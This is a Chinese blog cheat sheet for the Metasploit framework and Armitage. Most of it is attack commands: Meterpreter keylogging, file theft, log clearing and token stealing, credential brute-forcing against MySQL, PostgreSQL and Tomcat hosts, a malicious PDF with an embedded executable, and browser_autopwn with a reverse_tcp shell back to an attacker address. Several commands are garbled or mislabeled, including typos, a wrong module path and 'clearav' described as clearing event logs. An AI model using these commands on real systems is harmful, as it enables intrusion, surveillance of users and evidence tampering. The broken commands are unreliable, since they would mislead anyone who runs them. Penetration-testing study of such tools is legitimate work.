• msf、armitage


    msfconsole的命令:
    msfconsole
    use module :这个命令允许你开始配置所选择的模块。
    set optionname module :这个命令允许你为指定的模块配置不同的选项。
    exploit :这个命令启动漏洞利用模块
    run :这个命令启动非漏洞利用模块。
    search module :这个命令允许你搜索独立模块。
    help
    exit


    msfcli的命令:
    msfcli
    msfcli [PATH TO EXPLOIT] [options = value] :这是执行漏洞利用的语法。
    msf -h


    Meterpreter 执行实际的载荷分发和漏洞利用工作:
    background :这个命令允许你在后台运行 Meterpreter 会话。这个命令也能为你带回MSF 提示符。
    download :这个命令允许你从受害者机器中下载文件。
    upload :这个命令允许你向受害者机器上传文件。
    execute :这个命令允许你在受害者机器上运行命令。
    shell :这个命令允许你在受害者机器上运行 Windows shell 提示符( 仅限于 Windows主机) 。
    session -i :这个命令允许你在会话之间切换。


    开始记录目标系统中用户的击键顺序:
    keyscan_start

    转储目标系统中用户的击键顺序。击键顺序会显示在屏幕上:
    keyscan_dump

    停止记录目标系统中用户的击键顺序。
    keyscan_stop

    删除目标系统中的文件。
    del exploited.docx

    清除目标系统中的事件日志。
    clearav

    展示运行进程的列表。
    ps

    杀掉受害者系统的指定进程,使用 kill [pid] 语法。
    kill 6353

    尝试偷取目标系统上的模拟令牌。
    steal_token


    msfconsole mysql
    use auxiliary/scanner/mysql/mysql_login
    show options
    set RHOST 192.168.10.111
    set user_file /root/Desktop/usernames.txt
    set pass_file /root/Desktop/passwords.txt
    exploit


    msfconsole postgresql
    use auxiliary/scanner/mysql/postgres_login
    show options
    set RHOST 192.168.10.111
    set user_file /root/Desktop/usernames.txt
    set pass_file /root/Desktop/passwords.txt
    exploit


    msfconsole tomcat
    use auxiliary/scanner/http/tomcat_mgr_login
    show options
    PASS_FILE meset /usr/share/metasploit-framework/data/wordlists/ tomcat_mgr_default_pass.txt
    USER_FILE mset /usr/share/metasploit-framework/data/wordlists/ tomcat_mgr_default_pass.txt
    set RHOSTS 192.168.10.111
    set RPORT 8180
    exploit


    msfconsole
    msfconsole pdf
    use exploit/windows/fileformat/adobe_pdf_embedded_exe
    show options
    set FILENAME evildocument.pdf
    set INFILENAME /root/Desktop/willie.pdf
    exploit


    实现 browser_autopwn:
    浏览器 Autopwn 是 Metasploit 提供的辅助模块,在受害者访问网页时,让你能够自动化对它
    们的攻击。浏览器 Autopwn 在攻击之前指定客户端的指纹识别,也就是说他不会对 IE 7 尝试
    利用 Firefox 的漏洞。基于它的浏览器判断,它决定最适于实施哪个漏洞利用。
    msfconsole autopwn
    use auxiliary/server/browser_autopwn
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.10.109
    set URIPATH "filetypes"
    exploit
    Metasploit 会在 IP 地址 <http://[Provided IP Address]:8080> 处执行漏洞利用。
    当访问者访问这个地址时, browser_autopwn 模块尝试连接用户的机器来建立远程会话。
    如果成功的话,Meterpreter 会确认这个会话。使用会话命令来激活它:
    session –I 1

    ...............................................................认真写每篇博客,如同我对待生活............................................................
  • 相关阅读:
    个人博客12
    《梦断代码》阅读笔记03
    个人博客11
    个人博客10
    【Codeforces 404C】Restore Graph
    【Codeforces 476C】Dreamoon and Sums
    【Codeforces 242C】King's Path
    【Codeforces 382C】Arithmetic Progression
    【Codeforces 1096D】Easy Problem
    【Codeforces 494A】Treasure
  • 原文地址:https://www.cnblogs.com/itholidaycn/p/6393910.html
Copyright © 2020-2023  润新知